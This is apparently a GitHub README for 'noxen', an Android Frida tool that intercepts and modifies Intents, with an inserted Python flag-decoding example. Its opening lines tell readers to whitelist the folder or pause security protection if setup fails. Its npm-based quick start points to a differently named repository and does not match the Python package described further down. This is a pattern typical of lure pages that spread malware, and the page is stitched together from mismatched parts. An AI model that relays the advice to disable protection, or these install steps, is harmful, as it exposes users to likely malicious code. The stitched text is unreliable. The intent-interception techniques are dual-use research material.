
InspectorBlock/noxen-741

Tip

If the setup does not start, add the folder to the allowed list or pause protection for a few minutes.

Caution

Some security systems may block the installation. Only download from the official repository.


QUICK START

git clone https://github.com/InspectorBlock/noxen-741.git
cd noxen-741
npm install
npm start

Android runtime interception for security research. noxen uses Frida to hook Java methods in a running Android process and map how app components communicate at runtime. It captures attack-surface events such as android.content.Intent objects, then lets you inspect, modify, forward, or drop them from a terminal UI.


noxen Home tab

What It Does

  • Helps map component communication and attack-surface behavior at runtime.
  • Intercepts common Android runtime entry points such as getIntent, startActivity, sendBroadcast, startService, and PendingIntent creation paths.
  • Shows action, component, data URI, flags, categories, extras, PendingIntent flags, optional Java stack traces, and attack-surface labels where available.
  • Lets you modify intent action, data, categories, flags, and extras before forwarding.
  • Lets you drop intercepted intents.
  • Stores captured history, outcomes, filters, columns, and modified intent snapshots in .noxen project files.
  • Provides independent Intercept and History filters.
  • Provides an optional Home-tab Input ANR bypass (experimental) for rooted test devices, focused on input-dispatch ANRs while noxen intentionally holds a target thread.
  • Uses a structured Log tab with aligned source/level columns and optional Verbose logs for detailed hook and bypass diagnostics.
  • Analyzes APKs with androguard to generate hook configuration.
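The flag fields listed above are raw bitmasks, so reviewing captured records means decoding them first. The following is an added example, not noxen's own code: it decodes Intent and PendingIntent flags using the public Android SDK constant values and attaches review labels. The record layout, the label names and the sample records are assumptions constructed for illustration and do not reflect the .noxen file format.

```python
# Added example. Flag values are public Android SDK constants.
INTENT_FLAGS = {
    0x00000001: "FLAG_GRANT_READ_URI_PERMISSION",
    0x00000002: "FLAG_GRANT_WRITE_URI_PERMISSION",
    0x00000040: "FLAG_GRANT_PERSISTABLE_URI_PERMISSION",
    0x00000080: "FLAG_GRANT_PREFIX_URI_PERMISSION",
    0x04000000: "FLAG_ACTIVITY_CLEAR_TOP",
    0x10000000: "FLAG_ACTIVITY_NEW_TASK",
}
PENDING_FLAGS = {
    0x02000000: "FLAG_MUTABLE",
    0x04000000: "FLAG_IMMUTABLE",
    0x08000000: "FLAG_UPDATE_CURRENT",
    0x10000000: "FLAG_CANCEL_CURRENT",
    0x20000000: "FLAG_NO_CREATE",
    0x40000000: "FLAG_ONE_SHOT",
}
IMMUTABLE = 0x04000000

def decode(mask, table):
    """Names of known flags set in mask, then any unknown bits as hex."""
    names = [name for bit, name in sorted(table.items()) if mask & bit]
    known = 0
    for bit in table:
        known |= bit
    if mask & ~known:
        names.append(hex(mask & ~known))
    return names

def triage(record):
    """Decode one captured record (hypothetical layout) and label it."""
    flags = decode(record.get("flags", 0), INTENT_FLAGS)
    labels, pending_names = [], []
    if not record.get("component"):
        labels.append("implicit-intent")  # no explicit target component
    if any(n.startswith("FLAG_GRANT_") for n in flags):
        labels.append("uri-permission-grant")
    pending = record.get("pending_flags")
    if pending is not None:  # record came from a PendingIntent creation path
        pending_names = decode(pending, PENDING_FLAGS)
        if not pending & IMMUTABLE:
            labels.append("pendingintent-not-immutable")
    return {"flags": flags, "pending_flags": pending_names, "labels": labels}

SAMPLE = [  # constructed records, not real captures
    {"api": "startActivity", "component": None, "flags": 0x10000001},
    {"api": "PendingIntent.getActivity", "component": None, "pending_flags": 0x0A000000},
    {"api": "PendingIntent.getBroadcast", "component": "com.example/.Receiver", "pending_flags": 0x0C000000},
]
```

Bits not present in either table are reported as a hex residue rather than dropped, so an unfamiliar flag still shows up during review.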

Interface Preview

Intercept tab

History tab

Playground App

The companion Android target app lives in the noxen-playground repository. It is named noxen playground on device and uses the package com.frankheat.noxen.playground.

Use it to validate common runtime flows while developing noxen:

cd ../noxen-playground
./gradlew assembleDebug

Open noxen-playground/ directly in Android Studio rather than the workspace parent directory.

Development

The Python package uses a src layout: importable code lives in src/noxen/. This keeps the repository root separate from the installed package and avoids shell ambiguity between the noxen command and a local package directory.

After changing Python code, run the unit tests. When validating Frida compatibility, repeat the same checks with the Frida environments you support. For example, this repository is commonly tested with local Frida 16 and Frida 17 virtual environments:

../frida-16.6.6/bin/python -m compileall -q src/noxen
PYTHONPATH=src ../frida-16.6.6/bin/python -m unittest discover -s tests
../frida-17.7.3/bin/python -m compileall -q src/noxen
PYTHONPATH=src ../frida-17.7.3/bin/python -m unittest discover -s tests

After changing agent/script.js or agent/system_server.js, rebuild the committed Frida bundles and packaged runtime copies:

Commit the changed source script, its matching *_bundle.js file, and the synced src/noxen/runtime/ copy. Do not commit node_modules/.

License

noxen is released under the GNU General Public License v3.0.

About

Android interception tool for component communication and attack-surface mapping
